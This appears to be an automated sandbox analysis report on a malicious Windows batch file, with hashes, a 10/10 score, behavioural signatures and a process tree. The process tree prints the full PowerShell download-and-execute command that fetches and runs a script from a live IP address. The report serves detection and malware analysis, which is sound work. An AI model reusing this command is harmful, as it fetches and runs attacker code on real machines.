Analysis
-
max time kernel
86s -
max time network
146s -
platform
windows10_x64 -
resource
win10 -
submitted
09-07-2020 08:10
Static task
static1
Behavioral task
behavioral1
Sample
8f9ff3aa474fa163cb2753cdce6a9abc.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
8f9ff3aa474fa163cb2753cdce6a9abc.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
8f9ff3aa474fa163cb2753cdce6a9abc.bat
-
Size
214B
-
MD5
6583fe9275827519cd2bad15c56e349c
-
SHA1
134d9f2a3be2ede4777cd9216538f582570c21e5
-
SHA256
65aca88b78d41c561c3ab4b732484deb7ba50a7a3b9499406faf938ee12085b8
-
SHA512
c96021e32ec898f32c0de82016c899052d36358d1e57512c4b4b0875e1507a7862b5837cb4e5e98b2a5726a059a1593749b0839fac788db9c70bfcdd07dea48b
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3404 wrote to memory of 3852 3404 cmd.exe powershell.exe PID 3404 wrote to memory of 3852 3404 cmd.exe powershell.exe PID 3404 wrote to memory of 3852 3404 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3028 3852 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3028 WerFault.exe Token: SeBackupPrivilege 3028 WerFault.exe Token: SeDebugPrivilege 3028 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe 3028 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');Invoke-QAYURDA;Start-Sleep -s 10000"2⤵PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3028